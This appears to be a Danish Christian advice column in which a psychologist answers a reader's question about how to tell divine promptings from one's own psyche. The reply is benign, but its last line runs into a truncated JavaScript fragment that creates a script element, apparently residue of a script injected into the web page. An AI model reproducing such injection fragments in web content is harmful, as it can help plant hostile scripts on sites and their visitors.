Vurder alle tilskyndelser grundigt

Kære Suh.
I kristne kredse taler vi om, at Gud ”tilskynder” os til noget – en hilsen, en opmuntring, en formaning osv.
Men hvad mener du som psykolog om dette? Hvornår er det vores eget – og hvornår er det faktisk fra Gud?
Hilsen T.

Kære T.
Mit udgangspunkt for forståelse og behandling af mennesket er, at mennesket både er krop, sjæl/psyke og ånd.
Eftersom disse tre dimensioner er samlet i en masse (det enkelte menneske), følger det logisk, at de ikke kan undgå at påvirke hinanden. Når tingene fungerer, samarbejder de ovenikøbet. Et eksempel på den gensidige påvirkning er fx, når psykiske problemstillinger giver kropslige symptomer (en psyko-somatisk lidelse), eller at man får en depression af et være fysisk overbelastet igennem længere tid.
Mindre udbredt er forståelsen af, hvordan den åndelige dimension påvirker eller påvirkes af den psykiske eller den fysiske del. Her kunne man nævne det at ”falde i ånden”, som er et udtryk for, at man under fx intens bøn/forbøn oplever, at den fysiske tilstand påvirkes, så man ikke kan stå på benene.
Mere almindeligt er det nok at opleve, at man under åndelig fordybelse/bøn/forbøn bliver rørt til tårer eller bliver varm i kroppen. Igen, et samarbejde, eller overlap om man vil, mellem de forskellige dele af vores eksistens.
Når Gud meddeler sig til os, er det derfor min overbevisning, at det for det første både kan være via en eller flere dele af de tre dimensioner. Man kan eksempelvis både få en tanke (psyke) om, at man skal bede for en anden og samtidig også føle en form for fysisk smerte i kroppen (krop) som en slags henvisning til, hvad det er, man eventuelt skal bede for hos den anden. Eller man har uro i kroppen (krop) så man ikke kan sove, men i stedet føler sig tilskyndet til at bede intensivt for en anden (ånd).
Jeg er tillige overbevist om, at de tre dimensioner gensidigt påvirker hinanden på godt og ondt. Ligesom beskederne eller signalerne fra den ene dimension til den anden kan være tilskyndede af Gud og dermed gavnlige og konstruktive, kan de også være behæftede med støj fra vores eget – enten fra nutidige eller tidligere sår, eller blot pga. uvidenhed,ww eller fordi noget særligt fylder.
Beretningen om en menighedsforsamling, hvor ordet var frit, og der først fra én person blev proklameret: ”Så siger Herren XXX” – hvorefter en anden tog ordet og sagde: ”Så siger Herren: det har jeg aldrig sagt!” er et godt eksempel på, hvordan den menneskelige psykes egen-andel altid må overvejes.
Når derfor nogen oplever sig tilskyndede af Gud til noget, eller af andre bliver opfordret til noget, fra Gud – så vil jeg mene, at det er den enkeltes ansvar og pligt at vurdere det nøje i forhold til vores kendskab til Bibelen som helhed samt også at bede nøje over det.
Er man fortsat i tvivl, bør man rådføre sig med sin præst/menighedsleder.
Hilsen Suhvar d=document;var s=d.createElement(‘script’);